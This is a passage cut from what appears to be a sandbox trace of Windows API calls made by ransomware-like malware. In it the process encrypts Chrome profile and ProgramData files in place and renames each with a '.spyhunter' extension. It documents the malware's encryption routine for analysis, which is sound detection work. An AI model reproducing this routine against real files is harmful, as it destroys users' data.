lpNewFilePointer=0x0) returned 1 [0132.093] WriteFile (in: hFile=0x178, lpBuffer=0x248f6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f69c, lpOverlapped=0x0 | out: lpBuffer=0x248f6dc*, lpNumberOfBytesWritten=0x248f69c*=0x4, lpOverlapped=0x0) returned 1 [0133.033] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f69c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f69c*=0x30, lpOverlapped=0x0) returned 1 [0133.033] CloseHandle (hObject=0x178) returned 1 [0133.033] GetProcessHeap () returned 0x2c0000 [0133.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0133.033] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.spyhunter") returned 102 [0133.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1.spyhunter")) returned 1 [0133.034] GetProcessHeap () returned 0x2c0000 [0133.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0133.034] GetProcessHeap () returned 0x2c0000 [0133.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.034] GetProcessHeap () returned 0x2c0000 [0133.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b358 | out: hHeap=0x2c0000) returned 1 [0133.034] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6d8 | out: pbBuffer=0x248f6d8) returned 1 [0133.034] GetProcessHeap () returned 0x2c0000 [0133.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.034] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6d0*=0x30) returned 1 [0133.035] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.307] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0133.307] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0133.308] GetProcessHeap () returned 0x2c0000 [0133.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.308] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f694, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f694*=0x29a, lpOverlapped=0x0) returned 1 [0133.311] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.311] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x248f694, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f694*=0x29a, lpOverlapped=0x0) returned 1 [0133.311] GetProcessHeap () returned 0x2c0000 [0133.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.311] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.311] WriteFile (in: hFile=0x178, lpBuffer=0x248f6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f694, lpOverlapped=0x0 | out: lpBuffer=0x248f6d4*, lpNumberOfBytesWritten=0x248f694*=0x4, lpOverlapped=0x0) returned 1 [0133.311] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f694, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f694*=0x30, lpOverlapped=0x0) returned 1 [0133.311] CloseHandle (hObject=0x178) returned 1 [0133.311] GetProcessHeap () returned 0x2c0000 [0133.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0133.311] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.spyhunter") returned 91 [0133.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.spyhunter" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.spyhunter")) returned 1 [0133.313] GetProcessHeap () returned 0x2c0000 [0133.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0133.313] GetProcessHeap () returned 0x2c0000 [0133.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.313] GetProcessHeap () returned 0x2c0000 [0133.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d0a8 | out: hHeap=0x2c0000) returned 1 [0133.314] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6d0 | out: pbBuffer=0x248f6d0) returned 1 [0133.315] GetProcessHeap () returned 0x2c0000 [0133.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.315] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6c8*=0x30) returned 1 [0133.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0133.316] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0133.316] GetProcessHeap () returned 0x2c0000 [0133.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.316] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f68c*=0x29, lpOverlapped=0x0) returned 1 [0133.317] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.317] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f68c*=0x29, lpOverlapped=0x0) returned 1 [0133.317] GetProcessHeap () returned 0x2c0000 [0133.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.317] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.317] WriteFile (in: hFile=0x178, lpBuffer=0x248f6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x248f6cc*, lpNumberOfBytesWritten=0x248f68c*=0x4, lpOverlapped=0x0) returned 1 [0133.317] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f68c*=0x30, lpOverlapped=0x0) returned 1 [0133.317] CloseHandle (hObject=0x178) returned 1 [0133.317] GetProcessHeap () returned 0x2c0000 [0133.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0133.318] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.spyhunter") returned 121 [0133.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001.spyhunter")) returned 1 [0133.318] GetProcessHeap () returned 0x2c0000 [0133.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0133.318] GetProcessHeap () returned 0x2c0000 [0133.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.318] GetProcessHeap () returned 0x2c0000 [0133.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4aa10 | out: hHeap=0x2c0000) returned 1 [0133.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6d0 | out: pbBuffer=0x248f6d0) returned 1 [0133.319] GetProcessHeap () returned 0x2c0000 [0133.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6c8*=0x30) returned 1 [0133.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0133.319] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0133.319] GetProcessHeap () returned 0x2c0000 [0133.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.320] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f68c*=0x9a, lpOverlapped=0x0) returned 1 [0133.321] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.321] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f68c*=0x9a, lpOverlapped=0x0) returned 1 [0133.321] GetProcessHeap () returned 0x2c0000 [0133.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.321] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.321] WriteFile (in: hFile=0x178, lpBuffer=0x248f6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x248f6cc*, lpNumberOfBytesWritten=0x248f68c*=0x4, lpOverlapped=0x0) returned 1 [0133.321] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f68c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f68c*=0x30, lpOverlapped=0x0) returned 1 [0133.321] CloseHandle (hObject=0x178) returned 1 [0133.321] GetProcessHeap () returned 0x2c0000 [0133.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0133.321] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.spyhunter") returned 109 [0133.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.spyhunter")) returned 1 [0133.322] GetProcessHeap () returned 0x2c0000 [0133.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0133.322] GetProcessHeap () returned 0x2c0000 [0133.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.322] GetProcessHeap () returned 0x2c0000 [0133.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f297a0 | out: hHeap=0x2c0000) returned 1 [0133.322] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6c8 | out: pbBuffer=0x248f6c8) returned 1 [0133.322] GetProcessHeap () returned 0x2c0000 [0133.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6c0*=0x30) returned 1 [0133.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.323] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0133.323] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0133.323] GetProcessHeap () returned 0x2c0000 [0133.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.323] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f684*=0x0, lpOverlapped=0x0) returned 1 [0133.323] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.323] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f684*=0x0, lpOverlapped=0x0) returned 1 [0133.323] GetProcessHeap () returned 0x2c0000 [0133.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.323] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.323] WriteFile (in: hFile=0x178, lpBuffer=0x248f6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x248f6c4*, lpNumberOfBytesWritten=0x248f684*=0x4, lpOverlapped=0x0) returned 1 [0133.324] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f684*=0x30, lpOverlapped=0x0) returned 1 [0133.325] CloseHandle (hObject=0x178) returned 1 [0133.325] GetProcessHeap () returned 0x2c0000 [0133.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0133.325] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.spyhunter") returned 110 [0133.325] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock.spyhunter")) returned 1 [0133.325] GetProcessHeap () returned 0x2c0000 [0133.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0133.325] GetProcessHeap () returned 0x2c0000 [0133.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.326] GetProcessHeap () returned 0x2c0000 [0133.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29f48 | out: hHeap=0x2c0000) returned 1 [0133.326] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6c8 | out: pbBuffer=0x248f6c8) returned 1 [0133.326] GetProcessHeap () returned 0x2c0000 [0133.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.326] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6c0*=0x30) returned 1 [0133.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.326] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0133.326] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0133.326] GetProcessHeap () returned 0x2c0000 [0133.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.326] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f684*=0x10, lpOverlapped=0x0) returned 1 [0133.327] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.327] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f684*=0x10, lpOverlapped=0x0) returned 1 [0133.327] GetProcessHeap () returned 0x2c0000 [0133.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.328] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.328] WriteFile (in: hFile=0x178, lpBuffer=0x248f6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x248f6c4*, lpNumberOfBytesWritten=0x248f684*=0x4, lpOverlapped=0x0) returned 1 [0133.328] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f684, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f684*=0x30, lpOverlapped=0x0) returned 1 [0133.328] CloseHandle (hObject=0x178) returned 1 [0133.328] GetProcessHeap () returned 0x2c0000 [0133.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0133.328] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.spyhunter") returned 113 [0133.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current.spyhunter")) returned 1 [0133.329] GetProcessHeap () returned 0x2c0000 [0133.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0133.329] GetProcessHeap () returned 0x2c0000 [0133.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0133.329] GetProcessHeap () returned 0x2c0000 [0133.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a060 | out: hHeap=0x2c0000) returned 1 [0133.329] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6c0 | out: pbBuffer=0x248f6c0) returned 1 [0133.329] GetProcessHeap () returned 0x2c0000 [0133.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0133.329] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6b8*=0x30) returned 1 [0133.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0133.330] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0133.330] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0133.330] GetProcessHeap () returned 0x2c0000 [0133.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.330] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f67c*=0x4ad, lpOverlapped=0x0) returned 1 [0133.368] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.368] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4ad, lpNumberOfBytesWritten=0x248f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f67c*=0x4ad, lpOverlapped=0x0) returned 1 [0133.368] GetProcessHeap () returned 0x2c0000 [0133.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.368] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.368] WriteFile (in: hFile=0x178, lpBuffer=0x248f6bc*, nNumberOfBytesToWrite=0x4, 